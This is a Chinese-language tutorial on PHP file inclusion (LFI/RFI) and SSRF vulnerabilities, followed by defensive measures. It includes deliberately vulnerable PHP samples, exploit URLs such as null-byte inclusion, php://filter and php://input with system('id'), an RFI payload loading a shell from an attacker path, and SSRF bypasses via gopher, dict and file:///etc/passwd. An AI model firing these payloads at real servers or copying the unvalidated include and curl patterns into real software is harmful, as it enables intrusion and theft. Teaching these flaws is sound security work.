PHP安全漏洞之文件包含与SSRF攻击全解析
<div id="navCategory"><h5 class="catalogue">目录</h5><ul class="first_class_ul"><li><a href="#_label0">前言</a></li><li><a href="#_label1">第一部分:文件包含漏洞详解</a></li><ul class="second_class_ul"><li><a href="#_lab2_1_0">什么是文件包含漏洞</a></li><li><a href="#_lab2_1_1">文件包含漏洞类型</a></li></ul><li><a href="#_label2">第二部分:SSRF漏洞深入解析</a></li><ul class="second_class_ul"><li><a href="#_lab2_2_2">什么是SSRF?</a></li><li><a href="#_lab2_2_3">常见危险函数</a></li><li><a href="#_lab2_2_4">SSRF绕过技巧</a></li></ul><li><a href="#_label3">防御SSRF的最佳实践</a></li><ul class="second_class_ul"></ul><li><a href="#_label4">结语</a></li><ul class="second_class_ul"></ul></ul></div><p class="maodian"><a name="_label0"></a></p><h2>前言</h2><p>在Web安全领域,PHP应用程序的安全问题一直备受关注。本文将深入探讨两种常见的PHP安全漏洞:文件包含漏洞和服务器端请求伪造(SSRF),帮助开发者理解漏洞原理、利用方式以及防御措施。</p>
<p class="maodian"><a name="_label1"></a></p><h2>第一部分:文件包含漏洞详解</h2>
<p class="maodian"><a name="_lab2_1_0"></a></p><h3>什么是文件包含漏洞</h3>
<p>文件包含漏洞是PHP应用程序中常见的安全问题,当开发者使用包含函数引入文件时,如果传入的文件名参数未经严格校验,攻击者就可能利用这个漏洞读取敏感文件甚至执行恶意代码。</p>
<p><strong>危险函数</strong></p>
<p>PHP中有四个主要的文件包含函数:</p>
<ul><li>include()</li><li>include_once()</li><li>require()</li><li>require_once()</li></ul>
<p class="maodian"><a name="_lab2_1_1"></a></p><h3>文件包含漏洞类型</h3>
<p><strong>1. 本地文件包含(LFI)</strong></p>
<p>利用方式:</p>
<ul><li>直接读取Flag文件</li><li>通过PHP伪协议读取源代码</li><li>写入PHP木马获取webshell</li></ul>
<p>示例代码:</p>
<div class="jb51code"><pre class="brush:php;"><?php
$file = $_GET['file'];
if(file_exists('/home/www/'.$file.'.php')) {
include '/home/www/'.$file.'.php';
} else {
include '/home/www/'.'home.php';
}
?>
</pre></div>
<p>利用方法:</p>
<div class="jb51code"><pre class="brush:php;">http://www.example.com/demo1.php?file=flag.php%00
</pre></div>
<p><strong>2. PHP伪协议利用</strong></p>
<p>常用伪协议:</p>
<p>file:// 协议:</p>
<div class="jb51code"><pre class="brush:php;">http://www.example.com/index.php?file=file://D:/phpStudy/WWW/flag.txt
</pre></div>
<p>php://filter:</p>
<div class="jb51code"><pre class="brush:php;">http://example.com/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
</pre></div>
<p>php://input:</p>
<div class="jb51code"><pre class="brush:php;">POST /index.php?file=php://input HTTP/1.1
...
<?php system('id'); ?>
</pre></div>
<p><strong>3. 远程文件包含(RFI)</strong></p>
<p>必要条件:</p>
<ul><li>allow_url_fopen = On</li><li>allow_url_include = On</li></ul>
<p>示例代码:</p>
<div class="jb51code"><pre class="brush:php;"><?php
$basePath = @$_GET['param'];
require_once $basePath.'/action/m_share.php';
?>
</pre></div>
<p>利用方法:</p>
<div class="jb51code"><pre class="brush:php;">http://www.example.com/demo4.php?param=http://www.xx.com/attacker/PHPshell.txt?
</pre></div>
<p><strong>防御措施</strong></p>
<p>1.白名单验证</p>
<p>2.禁用危险配置:</p>
<div class="jb51code"><pre class="brush:bash;">allow_url_fopen = Off
allow_url_include = Off
</pre></div>
<p>3.设置open_basedir</p>
<p>4.严格校验用户输入</p>
<p>5.避免动态包含</p>
<p class="maodian"><a name="_label2"></a></p><h2>第二部分:SSRF漏洞深入解析</h2>
<p class="maodian"><a name="_lab2_2_2"></a></p><h3>什么是SSRF?</h3>
<p>SSRF(Server-Side Request Forgery)是一种由攻击者构造形成由服务端发起请求的安全漏洞。攻击者可以利用此漏洞访问外网无法访问的内部系统。</p>
<p class="maodian"><a name="_lab2_2_3"></a></p><h3>常见危险函数</h3>
<p><strong>1.file_get_contents()</strong></p>
<div class="jb51code"><pre class="brush:php;"><?php
if (isset($_POST['url'])) {
$content = file_get_contents($_POST['url']);
$filename = '/images/'.rand().'img1.jpg';
file_put_contents($filename, $content);
echo $_POST['url'];
$img = "<img src=\"".$filename."\"/>";
echo $img;
}
?>
</pre></div>
<p><strong>2.fsockopen()</strong></p>
<div class="jb51code"><pre class="brush:php;"><?php
function GetFile($host, $port, $link) {
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);
if (!$fp) {
echo "$errstr (error number $errno) \n";
} else {
$out = "GET $link HTTP/1.1\r\n";
$out .= "Host: $host\r\n";
$out .= "Connection: Close\r\n\r\n";
$out .= "\r\n";
fwrite($fp, $out);
$contents = '';
while (!feof($fp)) {
$contents .= fgets($fp, 1024);
}
fclose($fp);
return $contents;
}
}
?></pre></div>
<p><strong>3.curl_exec()</strong></p>
<div class="jb51code"><pre class="brush:php;"><?php
if (isset($_POST['url'])) {
$link = $_POST['url'];
$curlobj = curl_init();
curl_setopt($curlobj, CURLOPT_POST, 0);
curl_setopt($curlobj, CURLOPT_URL,$link);
curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($curlobj);
curl_close($curlobj);
$filename = './curled/'.rand().'.txt';
file_put_contents($filename, $result);
echo $result;
}
?>
</pre></div>
<p class="maodian"><a name="_lab2_2_4"></a></p><h3>SSRF绕过技巧</h3>
<p>1. IP编码绕过</p>
<p>使用xip.io域名:</p>
<blockquote><p>10.0.0.1.xip.io</p></blockquote>
<p>IP转换为10进制</p>
<p>2. 协议变换</p>
<p>Dict协议:</p>
<blockquote><p>dict://192.168.1.1:8080/test:dict</p></blockquote>
<p>Gopher协议:</p>
<blockquote><p>gopher://192.168.1.1/gopher</p></blockquote>
<p>File协议:</p>
<blockquote><p>file:///etc/passwd</p></blockquote>
<p>3. Gopher协议高级利用</p>
<p>Gopher协议可以多种服务:</p>
<blockquote><p>FTP<br />Telnet<br />Redis<br />Memcache</p></blockquote>
<p>Redis攻击示例:</p>
<div class="jb51code"><pre class="brush:php;"><?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
?>
</pre></div>
<p>4. filter_var()绕过</p>
<div class="jb51code"><pre class="brush:php;"><?php
$url = $_GET['url'];
echo "Argument: ".$url. "\n";
if(filter_var($url, FILTER_VALIDATE_URL)) {
$r = parse_url($url);
var_dump($r);
if (preg_match('/skysec\.top$/', $r['host'])) {
exec("curl -v -s ".$r['host']."", $a);
} else {
echo "Error: Host not allowed";
}
} else {
echo "Error: Invalid URL";
}
?>
</pre></div>
<p>绕过方法:</p>
<div class="jb51code"><pre class="brush:php;">http://example.com/test.php?url=0://192.168.1.1.com:8080;skysec.top:80/
</pre></div>
<p>5. 30x跳转绕过</p>
<div class="jb51code"><pre class="brush:php;"><?php
$url = $_GET['url'];
print $url;
curl($url);
function curl($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
}
</pre></div>
<p class="maodian"><a name="_label3"></a></p><h2>防御SSRF的最佳实践</h2>
<p>限制协议:只允许HTTP和HTTPS</p>
<p>禁止访问内网IP</p>
<p>设置URL白名单</p>
<p>禁用CURLOPT_FOLLOWLOCATION</p>
<p>使用DNS解析结果校验</p>
<p>过滤返回信息</p>
<p class="maodian"><a name="_label4"></a></p><h2>结语</h2>
<p>文件包含和SSRF漏洞都可能对Web应用造成严重威胁。作为开发者,理解这些漏洞的原理和利用方式,才能更好地防御它们。安全是一个持续的过程,需要开发者保持警惕并不断更新知识。</p>
頁:
[1]